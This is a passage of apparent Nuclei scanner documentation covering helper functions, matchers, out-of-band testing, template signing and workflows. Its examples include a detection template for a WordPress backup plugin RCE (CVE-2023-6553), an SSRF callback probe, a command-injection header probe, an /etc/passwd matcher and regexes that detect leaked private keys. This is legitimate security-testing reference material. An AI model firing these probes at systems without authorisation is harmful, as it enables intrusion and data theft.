* `json_minify`, to minifies a JSON string by removing unnecessary whitespace.
* `json_prettify`, to prettifies a JSON string by adding indentation.
**Examples**
**`generate_jwt`**
To generate a JSON Web Token (JWT), you have to supply the JSON that you want to sign, *at least*.
Here is a list of supported algorithms for generating JWTs with `generate_jwt` function *(case-insensitive)*:
* `HS256`
* `HS384`
* `HS512`
* `RS256`
* `RS384`
* `RS512`
* `PS256`
* `PS384`
* `PS512`
* `ES256`
* `ES384`
* `ES512`
* `EdDSA`
* `NONE`
Empty string ("") also means `NONE`.
Format:
```yaml
{ { generate_jwt(json, algorithm, signature, maxAgeUnix) } }
```
> Arguments other than `json` are optional.
Example:
```yaml
variables:
json: | # required
{
"foo": "bar",
"name": "John Doe"
}
alg: "HS256" # optional
sig: "this_is_secret" # optional
age: '{{to_unix_time("2032-12-30T16:30:10+00:00")}}' # optional
jwt: '{{generate_jwt(json, "{{alg}}", "{{sig}}", "{{age}}")}}'
```
> The `maxAgeUnix` argument is to set the expiration `"exp"` JWT standard claim, as well as the `"iat"` claim when you call the function.
**`json_minify`**
Format:
```yaml
{ { json_minify(json) } }
```
Example:
```yaml
variables:
json: |
{
"foo": "bar",
"name": "John Doe"
}
minify: "{{json_minify(json}}"
```
`minify` variable output:
```json
{ "foo": "bar", "name": "John Doe" }
```
**`json_prettify`**
Format:
```yaml
{ { json_prettify(json) } }
```
Example:
```yaml
variables:
json: '{"foo":"bar","name":"John Doe"}'
pretty: "{{json_prettify(json}}"
```
`pretty` variable output:
```json
{
"foo": "bar",
"name": "John Doe"
}
```
**`resolve`**
Format:
```yaml
{ { resolve(host, format) } }
```
Here is a list of formats available for dns type:
* `4` or `a`
* `6` or `aaaa`
* `cname`
* `ns`
* `txt`
* `srv`
* `ptr`
* `mx`
* `soa`
* `caa`
## Examples
For more examples, see the [helper function examples](/templates/reference/helper-functions-examples)
# Javascript Helper Functions
Available JS Helper Functions that can be used in global js runtime & protocol specific helpers.
## Javascript Runtime
| Name | Description | Signatures |
| -------------- | -------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------- |
| atob | Base64 decodes a given string | `atob(string) string` |
| btoa | Base64 encodes a given string | `bota(string) string` |
| to\_json | Converts a given object to JSON | `to_json(any) object` |
| dump\_json | Prints a given object as JSON in console | `dump_json(any)` |
| to\_array | Sets/Updates objects prototype to array to enable Array.XXX functions | `to_array(any) array` |
| hex\_to\_ascii | Converts a given hex string to ascii | `hex_to_ascii(string) string` |
| Rand | Rand returns a random byte slice of length n | `Rand(n int) []byte` |
| RandInt | RandInt returns a random int | `RandInt() int` |
| log | log prints given input to stdout with \[JS] prefix for debugging purposes | `log(msg string)`, `log(msg map[string]interface{})` |
| getNetworkPort | getNetworkPort registers defaultPort and returns defaultPort if it is a colliding port with other protocols | `getNetworkPort(port string, defaultPort string) string` |
| isPortOpen | isPortOpen checks if given TCP port is open on host. timeout is optional and defaults to 5 seconds | `isPortOpen(host string, port string, [timeout int]) bool` |
| isUDPPortOpen | isUDPPortOpen checks if the given UDP port is open on the host. Timeout is optional and defaults to 5 seconds. | `isUDPPortOpen(host string, port string, [timeout int]) bool` |
| ToBytes | ToBytes converts given input to byte slice | `ToBytes(...interface{}) []byte` |
| ToString | ToString converts given input to string | `ToString(...interface{}) string` |
| Export | Converts a given value to a string and is appended to output of script | `Export(value any)` |
| ExportAs | Exports given value with specified key and makes it available in DSL and response | `ExportAs(key string,value any)` |
## Template Flow
| Name | Description | Signatures |
| ------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------- |
| log | Logs a given object/message to stdout (only for debugging purposes) | `log(obj any) any` |
| iterate | Normalizes and Iterates over all arguments (can be a string,array,null etc) and returns an array of objects\nNote: If the object type is unknown(i.e could be a string or array) iterate should be used and it will always return an array of strings | `iterate(...any) []any` |
| Dedupe | De-duplicates given values and returns a new array of unique values | `new Dedupe()` |
## Code Protocol
| Name | Description | Signatures |
| --------- | --------------------------------------------------- | ------------------ |
| OS | OS returns the current OS | `OS() string` |
| IsLinux | IsLinux checks if the current OS is Linux | `IsLinux() bool` |
| IsWindows | IsWindows checks if the current OS is Windows | `IsWindows() bool` |
| IsOSX | IsOSX checks if the current OS is OSX | `IsOSX() bool` |
| IsAndroid | IsAndroid checks if the current OS is Android | `IsAndroid() bool` |
| IsIOS | IsIOS checks if the current OS is IOS | `IsIOS() bool` |
| IsJS | IsJS checks if the current OS is JS | `IsJS() bool` |
| IsFreeBSD | IsFreeBSD checks if the current OS is FreeBSD | `IsFreeBSD() bool` |
| IsOpenBSD | IsOpenBSD checks if the current OS is OpenBSD | `IsOpenBSD() bool` |
| IsSolaris | IsSolaris checks if the current OS is Solaris | `IsSolaris() bool` |
| Arch | Arch returns the current architecture | `Arch() string` |
| Is386 | Is386 checks if the current architecture is 386 | `Is386() bool` |
| IsAmd64 | IsAmd64 checks if the current architecture is Amd64 | `IsAmd64() bool` |
| IsARM | IsArm checks if the current architecture is Arm | `IsARM() bool` |
| IsARM64 | IsArm64 checks if the current architecture is Arm64 | `IsARM64() bool` |
| IsWasm | IsWasm checks if the current architecture is Wasm | `IsWasm() bool` |
## JavaScript Protocol
| Name | Description | Signatures |
| ------------- | ---------------------------------------------------------------------------------------------- | ------------------------------------ |
| set | set variable from init code. this function is available in init code block only | `set(string, interface{})` |
| updatePayload | update/override any payload from init code. this function is available in init code block only | `updatePayload(string, interface{})` |
# Matchers
Review details on matchers for Nuclei
Matchers allow different type of flexible comparisons on protocol responses. They are what makes nuclei so powerful, checks are very simple to write and multiple checks can be added as per need for very effective scanning.
### Types
Multiple matchers can be specified in a request. There are basically 7 types of matchers:
| Matcher Type | Part Matched |
| ------------ | --------------------------- |
| status | Integer Comparisons of Part |
| size | Content Length of Part |
| word | Part for a protocol |
| regex | Part for a protocol |
| binary | Part for a protocol |
| dsl | Part for a protocol |
| xpath | Part for a protocol |
To match status codes for responses, you can use the following syntax.
```yaml
matchers:
# Match the status codes
- type: status
# Some status codes we want to match
status:
- 200
- 302
```
To match binary for hexadecimal responses, you can use the following syntax.
```yaml
matchers:
- type: binary
binary:
- "504B0304" # zip archive
- "526172211A070100" # RAR archive version 5.0
- "FD377A585A0000" # xz tar.xz archive
condition: or
part: body
```
Matchers also support hex encoded data which will be decoded and matched.
```yaml
matchers:
- type: word
encoding: hex
words:
- "50494e47"
part: body
```
**Word** and **Regex** matchers can be further configured depending on the needs of the users.
**XPath** matchers use XPath queries to match XML and HTML responses. If the XPath query returns any results, it's considered a match.
```yaml
matchers:
- type: xpath
part: body
xpath:
- "/html/head/title[contains(text(), 'Example Domain')]"
```
Complex matchers of type **dsl** allows building more elaborate expressions with helper functions. These function allow access to Protocol Response which contains variety of data based on each protocol. See protocol specific documentation to learn about different returned results.
```yaml
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200" # Body length less than 1024 and 200 status code
- "contains(toupper(body), md5(cookie))" # Check if the MD5 sum of cookies is contained in the uppercase body
```
Every part of a Protocol response can be matched with DSL matcher. Some examples -
| Response Part | Description | Example |
| --------------- | ----------------------------------------------- | ----------------------- |
| content\_length | Content-Length Header | content\_length >= 1024 |
| status\_code | Response Status Code | status\_code==200 |
| all\_headers | Unique string containing all headers | len(all\_headers) |
| body | Body as string | len(body) |
| header\_name | Lowercase header name with `-` converted to `_` | len(user\_agent) |
| raw | Headers + Response | len(raw) |
### Conditions
Multiple words and regexes can be specified in a single matcher and can be configured with different conditions like **AND** and **OR**.
1. **AND** - Using AND conditions allows matching of all the words from the list of words for the matcher. Only then will the request be marked as successful when all the words have been matched.
2. **OR** - Using OR conditions allows matching of a single word from the list of matcher. The request will be marked as successful when even one of the word is matched for the matcher.
### Matched Parts
Multiple parts of the response can also be matched for the request, default matched part is `body` if not defined.
Example matchers for HTTP response body using the AND condition:
```yaml
matchers:
# Match the body word
- type: word
# Some words we want to match
words:
- "[core]"
- "[config]"
# Both words must be found in the response body
condition: and
# We want to match request body (default)
part: body
```
Similarly, matchers can be written to match anything that you want to find in the response body allowing unlimited creativity and extensibility.
### Negative Matchers
All types of matchers also support negative conditions, mostly useful when you look for a match with an exclusions. This can be used by adding `negative: true` in the **matchers** block.
Here is an example syntax using `negative` condition, this will return all the URLs not having `PHPSESSID` in the response header.
```yaml
matchers:
- type: word
words:
- "PHPSESSID"
part: header
negative: true
```
### Multiple Matchers
Multiple matchers can be used in a single template to fingerprint multiple conditions with a single request.
Here is an example of syntax for multiple matchers.
```yaml
matchers:
- type: word
name: php
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
part: header
- type: word
name: node
words:
- "Server: NodeJS"
- "X-Powered-By: nodejs"
condition: or
part: header
- type: word
name: python
words:
- "Python/2."
- "Python/3."
condition: or
part: header
```
### Matchers Condition
While using multiple matchers the default condition is to follow OR operation in between all the matchers, AND operation can be used to make sure return the result if all matchers returns true.
```yaml
matchers-condition: and
matchers:
- type: word
words:
- "X-Powered-By: PHP"
- "PHPSESSID"
condition: or
part: header
- type: word
words:
- "PHP"
part: body
```
### Internal Matchers
When writing multi-protocol or `flow` based templates, there might be a case where we need to validate/match first request then proceed to next request and a good example of this is [`CVE-2023-6553`](https://github.com/projectdiscovery/nuclei-templates/blob/c5be73e328ebd9a0c122ea0324f60bbdd7eb940d/http/cves/2023/CVE-2023-6553.yaml#L21)
In this template, we are first checking if target is actual using `Backup Migration` plugin using matchers and if true then proceed to next request with help of `flow`
But this will print two results, one for each request match since we are using the first request matchers as a pre-condition to proceed to next request we can mark it as internal using `internal: true` in the matchers block.
```yaml
id: CVE-2023-6553
info:
name: Worpress Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution
author: FLX
severity: critical
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
### Global Matchers
Global matchers are essentially `matchers` that apply globally across all HTTP responses received from running other templates. This makes them super useful for things like passive detection, fingerprinting, spotting errors, WAF detection, identifying unusual behaviors, or even catching secrets and information leaks. By setting `global-matchers` to **true**, you're enabling the template to automatically match events triggered by other templates without having to configure them individually.
* Global matchers only work with [HTTP-protocol-based](/templates/protocols/http) templates.
* When global matchers are enabled, no requests defined in the template will be sent.
* This feature is not limited to `matchers`; you can also define `extractors` in a global matchers template.
Let's look at a quick example of how this works:
```yaml
# http-template-with-global-matchers.yaml
http:
- global-matchers: true
matchers-condition: or
matchers:
- type: regex
name: asymmetric_private_key
regex:
- '-----BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?-----'
part: body
- type: regex
name: slack_webhook
regex:
- >-
https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,24}
part: body
```
In this example, we're using a template that has `global-matchers` set to **true**. It looks for specific patterns, like an asymmetric private key or a Slack webhook, across all HTTP requests. Now, when you run this template along with others, the global matcher will automatically check for those patterns in all HTTP responses. You don't have to set up individual matchers in every single template for it to work.
To run it, use a command like this:
```console
> nuclei -u http://example.com -t http-template-with-global-matchers.yaml -t http-template-1.yaml -t http-template-2.yaml -silent
[http-template-with-global-matchers:asymmetric_private_key] http://example.com/request-from-http-template-1
[http-template-with-global-matchers:slack_webhook] http://example.com/request-from-http-template-2
```
In this case, the global matchers are looking for an asymmetric private key and a Slack webhook. As you can see in the output, it found a match in requests from the other templates, even though the matching logic was only defined once in the global matchers template. This makes it really efficient for detecting patterns across multiple requests without duplicating code in every single template.
# OOB Testing
Understanding OOB testing with Nuclei Templates
Since release of [Nuclei v2.3.6](https://github.com/projectdiscovery/nuclei/releases/tag/v2.3.6), Nuclei supports using the [interactsh](https://github.com/projectdiscovery/interactsh) API to achieve OOB based vulnerability scanning with automatic Request correlation built in. It's as easy as writing `{{interactsh-url}}` anywhere in the request, and adding a matcher for `interact_protocol`. Nuclei will handle correlation of the interaction to the template & the request it was generated from allowing effortless OOB scanning.
## Interactsh Placeholder
`{{interactsh-url}}` placeholder is supported in **http** and **network** requests.
An example of nuclei request with `{{interactsh-url}}` placeholders is provided below. These are replaced on runtime with unique interactsh URLs.
```yaml
- raw:
- |
GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
```
## Interactsh Matchers
Interactsh interactions can be used with `word`, `regex` or `dsl` matcher/extractor using following parts.
| part |
| -------------------- |
| interactsh\_protocol |
| interactsh\_request |
| interactsh\_response |
**interactsh\_protocol**
Value can be dns, http or smtp. This is the standard matcher for every interactsh based template with DNS often as the common value as it is very non-intrusive in nature.
**interactsh\_request**
The request that the interactsh server received.
**interactsh\_response**
The response that the interactsh server sent to the client.
Example of Interactsh DNS Interaction matcher:
```yaml
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
Example of HTTP Interaction matcher + word matcher on Interaction content
```yaml
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: regex
part: interactsh_request # Confirms the retrieval of /etc/passwd file
regex:
- "root:[x*]:0:0:"
```
# Preprocessors
Review details on pre-processors for Nuclei
Certain pre-processors can be specified globally anywhere in the template that run as soon as the template is loaded to achieve things like random ids generated for each template run.
### randstr
Generates a [random ID](https://github.com/rs/xid) for a template on each nuclei run. This can be used anywhere in the template and will always contain the same value. `randstr` can be suffixed by a number, and new random ids will be created for those names too. Ex. `{{randstr_1}}` which will remain same across the template.
`randstr` is also supported within matchers and can be used to match the inputs.
For example:-
```yaml
http:
- method: POST
path:
- "{{BaseURL}}/level1/application/"
headers:
cmd: echo '{{randstr}}'
matchers:
- type: word
words:
- '{{randstr}}'
```
# Template Signing
Review details on template signing for Nuclei
Template signing via the private-public key mechanism is a crucial aspect of ensuring the integrity, authenticity, and security of templates. This mechanism involves the use of asymmetric cryptography, specifically the Elliptic Curve Digital Signature Algorithm (ECDSA), to create a secure and verifiable signature.
In this process, a template author generates a private key that remains confidential and securely stored. The corresponding public key is then shared with the template consumers. When a template is created or modified, the author signs it using their private key, generating a unique signature that is attached to the template.
Template consumers can verify the authenticity and integrity of a signed template by using the author's public key. By applying the appropriate cryptographic algorithm (ECDSA), they can validate the signature and ensure that the template has not been tampered with since it was signed. This provides a level of trust, as any modifications or unauthorized changes to the template would result in a failed verification process.
By employing the private-public key mechanism, template signing adds an additional layer of security and trust to the template ecosystem. It helps establish the identity of the template author and ensures that the templates used in various systems are genuine and have not been altered maliciously.
**What does signing a template mean?**
Template signing is a mechanism to ensure the integrity and authenticity of templates. The primary goal is to provide template writers and consumers a way to trust crowdsourced or custom templates ensuring that they are not tampered with.
All [official Nuclei templates](https://github.com/projectdiscovery/nuclei-templates) include a digital signature and are verified by Nuclei while loading templates using ProjectDiscovery's public key (shipped with the Nuclei binary).
Individuals or organizations running Nuclei in their work environment can generate their own key-pair with `nuclei` and sign their custom templates with their private key, thus ensuring that only authorized templates are being used in their environment.
This also allows entities to fully utilize the power of new protocols like `code` without worrying about malicious custom templates being used in their environment.
**NOTE:**
* **Template signing is optional for all protocols except `code`**.
* **Unsigned code templates are disabled and can not be executed using Nuclei**.
* **Only signed code templates by the author (yourself) or ProjectDiscovery can be executed.**
* **Template signing is primarily introduced to ensure security of template to run code on host machine.**
* Code file references (for example: `source: protocols/code/pyfile.py`) are allowed and content of these files is included in the template digest.
* Payload file references (for example: `payloads: protocols/http/params.txt`) are not included in the template digest as it is treated as a payload/helper and not actual code that is being executed.
* Template signing is deterministic while both signing and verifying a template i.e. if a code file is referenced in a template that is present outside of templates directory with `-lfa` flag then verification will fail if same template is used without `-lfa` flag. (Note this only applies to `-lfa` i.e. local file access flag only)
### Signing Custom Template
The simplest and recommended way to generate key-pair and signing/verfifying templates is to use `nuclei` itself.
When signing a template if key-pair does not exist then Nuclei will prompt user to generate a new key-pair with options.
```console
$ ./nuclei -t templates.yaml -sign
[INF] Generating new key-pair for signing templates
[*] Enter User/Organization Name (exit to abort) : acme
[*] Enter passphrase (exit to abort):
[*] Enter same passphrase again:
[INF] Successfully generated new key-pair for signing templates
```
> **Note:** Passphrase is optional and can be left blank when used private key is encrypted with passphrase using PEMCipherAES256 Algo
Once a key-pair is generated, you can sign any custom template using `-sign` flag as shown below.
```console
$ ./nuclei -t templates.yaml -sign
[INF] All templates signatures were elaborated success=1 failed=0
```
> **Note:** Every time you make any change in your code template, you need to re-sign it to run with Nuclei.
### Template Digest and Signing Keys
When a template is signed, a digest is generated and added to the template. This digest is a hash of the template content and is used to verify the integrity of the template. If the template is modified after signing, the digest will change, and the signature verification will fail during template loading.
```yaml
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
The digest is in the format of `signature:fragment`, where the signature is the digital signature of the template used to verify its integrity, and the fragment is metadata generated by MD5 hashing the public key to disable re-signing of code templates not written by you.
The key-pair generated by Nuclei is stored in two files in the `$CONFIG/nuclei/keys directory`, where `$CONFIG` is the system-specific config directory. The private key is stored in nuclei-user-private-key.pem, which is encrypted with a passphrase if provided. The public key is stored in nuclei-user.crt, which includes the public key and identifier (e.g., user/org name) in a self-signed certificate.
```bash
$ la ~/.config/nuclei/keys
total 16
-rw------- 1 tarun staff 251B Oct 4 21:45 nuclei-user-private-key.pem # encrypted private key with passphrase
-rw------- 1 tarun staff 572B Oct 4 21:45 nuclei-user.crt # self signed certificate which includes public key and identifier (i.e user/org name)
```
To use the public key for verification, you can either copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_CERTIFICATE` environment variable to the path or content of the public key.
To use the private key, you can copy it to the `$CONFIG/nuclei/keys` directory on another user's machine, or set the `NUCLEI_USER_PRIVATE_KEY` environment variable to the path or content of the private key.
```console
$ export NUCLEI_USER_CERTIFICATE=$(cat path/to/nuclei-user.crt)
$ export NUCLEI_USER_PRIVATE_KEY=$(cat path/to/nuclei-user-private-key.pem)
```
It's important to note that you are responsible for securing and managing the private key, and Nuclei has no accountability for any loss of the private key.
By default, Nuclei loads the user certificate (public key) from the default locations mentioned above and uses it to verify templates. When running Nuclei, it will execute signed templates and warn about executing unsigned custom templates and block unsigned code templates. You can disable this warning by setting the `HIDE_TEMPLATE_SIG_WARNING` environment variable to `true`.
## FAQ
**Found X unsigned or tampered code template?**
```bash
./nuclei -u scanme.sh -t simple-code.yaml
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.0.0-dev
projectdiscovery.io
[WRN] Found 1 unsigned or tampered code template (carefully examine before using it & use -sign flag to sign them)
[INF] Current nuclei version: v3.0.0-dev (development)
[INF] Current nuclei-templates version: v9.6.4 (latest)
[WRN] Executing 1 unsigned templates. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] No results found. Better luck next time!
[FTL] Could not run nuclei: no templates provided for scan
```
Here `simple-code.yaml` is a code protocol template which is not signed or content of template has been modified after signing which indicates loss of integrity of template.
If you are template writer then you can go ahead and sign the template using `-sign` flag and if you are template consumer then you should carefully examine the template before signing it.
**Re-signing code templates are not allowed for security reasons?**
```bash
nuclei -u scanme.sh -t simple-code.yaml -sign
[ERR] could not sign 'simple-code.yaml': [signer:RUNTIME] re-signing code templates are not allowed for security reasons.
[INF] All templates signatures were elaborated success=0 failed=1
```
The error message `re-signing code templates are not allowed for security reasons` comes from the Nuclei engine. This error indicates that a code template initially signed by another user and someone is trying to re-sign it.
This measure was implemented to prevent running untrusted templates unknowingly, which might lead to potential security issues.
When you encounter this error, it suggests that you're dealing with a template that has been signed by another user Likely, the original signer is not you or the team from projectdiscovery.
By default, Nuclei disallows executing code templates that are signed by anyone other than you or from the public templates provided by projectdiscovery/nuclei-templates.
This is done to prevent potential security abuse using code templates.
To resolve this error:
1. Open and thoroughly examine the code template for any modifications.
2. Manually remove the existing digest signature from the template.
3. Sign the template again.
This way, you can ensure that only templates verified and trusted by you (or projectdiscovery) are run, thus maintaining a secure environment.
# Variables
Review details on variables for Nuclei
Variables can be used to declare some values which remain constant throughout the template. The value of the variable once calculated does not change. Variables can be either simple strings or DSL helper functions. If the variable is a helper function, it is enclosed in double-curly brackets `{{}}`. Variables are declared at template level.
Example variables -
```yaml
variables:
a1: "test" # A string variable
a2: "{{to_lower(rand_base(5))}}" # A DSL function variable
```
Currently, `dns`, `http`, `headless` and `network` protocols support variables.
Example of templates with variables -
```yaml
# Variable example using HTTP requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "value"
a2: "{{base64('hello')}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{FQDN}}
Test: {{a1}}
Another: {{a2}}
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "value"
- "aGVsbG8="
```
```yaml
# Variable example for network requests
id: variables-example
info:
name: Variables Example
author: pdteam
severity: info
variables:
a1: "PING"
a2: "{{base64('hello')}}"
tcp:
- host:
- "{{Hostname}}"
inputs:
- data: "{{a1}}"
read-size: 8
matchers:
- type: word
part: data
words:
- "{{a2}}"
```
# Nuclei Template Structure
Learn the common elements required to create a Nuclei Template
# Template Structure
Nuclei Templates use a custom YAML-based DSL, with their structure varying according to the specific protocol employed. Typically, a template comprises the following elements:
* A [unique ID](#id) for the template
* Essential [information](#information) and [metadata](#metadata) relevant to the template
* The designated protocol, such as [HTTP](/templates/protocols/http/basic-http), [DNS](/templates/protocols/dns), [File](/templates/protocols/file), etc.
* Details specific to the chosen protocol, like the requests made in the HTTP protocol
* A series of [matchers](/templates/reference/matchers) to ascertain the presence of findings
* Necessary [extractors](/templates/reference/extractors) for data retrieval from the results
For a detailed, automatically generated overview of everything available in the nuclei template syntax, you can visit the [syntax reference](https://github.com/projectdiscovery/nuclei/blob/dev/SYNTAX-REFERENCE.md) on GitHub
## ID
Each template has a unique ID which is used during output writing to specify the template name for an output line.
The template file ends with **YAML** extension. The template files can be created any text editor of your choice.
```yaml
id: git-config
```
ID must not contain spaces. This is done to allow easier output parsing.
## Information
Next important piece of information about a template is the **info** block. Info block provides **name**, **author**, **severity**, **description**, **reference**, **tags** and `metadata`. It also contains **severity** field which indicates the severity of the template, **info** block also supports dynamic fields, so one can define N number of `key: value` blocks to provide more useful information about the template. **reference** is another popular tag to define external reference links for the template.
Another useful tag to always add in `info` block is **tags**. This allows you to set some custom tags to a template, depending on the purpose like `cve`, `rce` etc. This allows nuclei to identify templates with your input tags and only run them.
Example of an info block -
```yaml
info:
name: Git Config File Detection Template
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
reference: https://www.acunetix.com/vulnerabilities/web/git-repository-found/
tags: git,config
```
Actual requests and corresponding matchers are placed below the info block, and they perform the task of making requests to target servers and finding if the template request was successful.
Each template file can contain multiple requests to be made. The template is iterated and one by one the desired requests are made to the target sites.
The best part of this is you can simply share your crafted template with your teammates, triage/security team to replicate the issue on the other side with ease.
## Metadata
It's possible to add metadata nodes, for example, to integrates with [uncover](https://github.com/projectdiscovery/uncover) (cf. [Uncover Integration](https://docs.projectdiscovery.io/tools/nuclei/running#scan-on-internet-database)).
The metadata nodes are crafted this way: `-query: ''` where:
* `` is the search engine, equivalent of the value of the `-ue` option of nuclei or the `-e` option of uncover
* `` is the search query, equivalent of the value of the `-uq` option of nuclei or the `-q` option of uncover
For example for Shodan:
```
info:
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
# Workflow Examples
Review some template workflow examples for Nuclei
## Generic workflows
A generic workflow that runs two templates, one to detect Jira and another to detect Confluence.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/jira-detect.yaml
- template: technologies/confluence-detect.yaml
```
## Basic conditional workflows
A condition based workflow, which first tries to detect if springboot is running on a target. If springboot is found, a list of exploits executed against it.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: security-misconfiguration/springboot-detect.yaml
subtemplates:
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2018-1271.yaml
- template: cves/CVE-2020-5410.yaml
- template: vulnerabilities/springboot-actuators-jolokia-xxe.yaml
- template: vulnerabilities/springboot-h2-db-rce.yaml
```
## Multi condition workflows
This template demonstrates nested workflows with nuclei, where there's multiple levels of chaining of templates.
```yaml
id: springboot-workflow
info:
name: Springboot Security Checks
author: dwisiswant0
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: technologies/lotus-domino-version.yaml
subtemplates:
- template: cves/xx-yy-zz.yaml
subtemplates:
- template: cves/xx-xx-xx.yaml
```
## Conditional workflows with matcher
This template detects if WordPress is running on an input host, and if found a set of targeted exploits and CVEs are executed against it.
```yaml
id: workflow-example
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: wordpress
subtemplates:
- template: cves/CVE-2019-6715.yaml
- template: cves/CVE-2019-9978.yaml
- template: files/wordpress-db-backup.yaml
- template: files/wordpress-debug-log.yaml
- template: files/wordpress-directory-listing.yaml
- template: files/wordpress-emergency-script.yaml
- template: files/wordpress-installer-log.yaml
- template: files/wordpress-tmm-db-migrate.yaml
- template: files/wordpress-user-enumeration.yaml
- template: security-misconfiguration/wordpress-accessible-wpconfig.yaml
- template: vulnerabilities/sassy-social-share.yaml
- template: vulnerabilities/w3c-total-cache-ssrf.yaml
- template: vulnerabilities/wordpress-duplicator-path-traversal.yaml
- template: vulnerabilities/wordpress-social-metrics-tracker.yaml
- template: vulnerabilities/wordpress-wordfence-xss.yaml
- template: vulnerabilities/wordpress-wpcourses-info-disclosure.yaml
```
## Multiple Matcher workflow
Very similar to the last example, with multiple matcher names.
```yaml
id: workflow-multiple-matcher
info:
name: Test Workflow Template
author: pdteam
workflows:
- template: technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- tags: vbulletin
- name: jboss
subtemplates:
- tags: jboss
```
# Template Workflows Overview
Learn about template workflows in Nuclei
Workflows enable users to orchestrate a series of actions by setting a defined execution order for various templates. These templates are activated upon predetermined conditions, establishing a streamlined method to leverage the capabilities of nuclei tailored to the user's specific requirements. Consequently, you can craft workflows that are contingent on particular technologies or targets—such as those exclusive to WordPress or Jira—triggering these sequences only when the relevant technology is identified.
Within a workflow, all templates share a unified execution environment, which means that any named extractor from one template can be seamlessly accessed in another by simply referencing its designated name.
For those with prior knowledge of the technology stack in use, we advise constructing personalized workflows for your scans. This strategic approach not only substantially reduces the duration of scans but also enhances the quality and precision of the outcomes.
Workflows can be defined with `workflows` attribute, following the `template` / `subtemplates` and `tags` to execute.
```yaml
workflows:
- template: http/technologies/template-to-execute.yaml
```
**Type of workflows**
1. [Generic workflows](#generic-workflows)
2. [Conditional workflows](#conditional-workflows)
## Generic Workflows
In generic workflow one can define single or multiple template to be executed from a single workflow file. It supports both files and directories as input.
A workflow that runs all config related templates on the list of give URLs.
```yaml
workflows:
- template: http/exposures/configs/git-config.yaml
- template: http/exposures/configs/exposed-svn.yaml
- template: http/vulnerabilities/generic/generic-env.yaml
- template: http/exposures/backups/zip-backup-files.yaml
- tags: xss,ssrf,cve,lfi
```
A workflow that runs specific list of checks defined for your project.
```yaml
workflows:
- template: http/cves/
- template: http/exposures/
- tags: exposures
```
## Conditional Workflows
You can also create conditional templates which execute after matching the condition from a previous template. This is mostly useful for vulnerability detection and exploitation as well as tech based detection and exploitation. Use-cases for this kind of workflows are vast and varied.
**Templates based condition check**
A workflow that executes subtemplates when base template gets matched.
```yaml
workflows:
- template: http/technologies/jira-detect.yaml
subtemplates:
- tags: jira
- template: exploits/jira/
```
**Matcher Name based condition check**
A workflow that executes subtemplates when a matcher of base template is found in result.
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: vbulletin
subtemplates:
- template: exploits/vbulletin-exp1.yaml
- template: exploits/vbulletin-exp2.yaml
- name: jboss
subtemplates:
- template: exploits/jboss-exp1.yaml
- template: exploits/jboss-exp2.yaml
```
In similar manner, one can create as many and as nested checks for workflows as needed.
**Subtemplate and matcher name based multi level conditional check**
A workflow showcasing chain of template executions that run only if the previous templates get matched.
```yaml
workflows:
- template: http/technologies/tech-detect.yaml
matchers:
- name: lotus-domino
subtemplates:
- template: http/technologies/lotus-domino-version.yaml
subtemplates:
- template: http/cves/2020/xx-yy-zz.yaml
subtemplates:
- template: http/cves/2020/xx-xx-xx.yaml
```
Conditional workflows are great examples of performing checks and vulnerability detection in most efficient manner instead of spraying all the templates on all the targets and generally come with good ROI on your time and is gentle for the targets as well.
## Shared Execution Context
Nuclei engine supports transparent workflow cookiejar and key-value sharing across templates parts of a same workflow. Here follow an example of a workflow that extract a value from the first template and use it in the second conditional one:
```yaml
id: key-value-sharing-example
info:
name: Key Value Sharing Example
author: pdteam
severity: info
workflows:
- template: template-with-named-extractor.yaml
subtemplates:
- template: template-using-named-extractor.yaml
```
For example, the following templates extract `href` links from a target web page body and make the value available under the `extracted` key:
```yaml
# template-with-named-extractor.yaml
id: value-sharing-template1
info:
name: value-sharing-template1
author: pdteam
severity: info
http:
- path:
- "{{BaseURL}}/path1"
extractors:
- type: regex
part: body
name: extracted
regex:
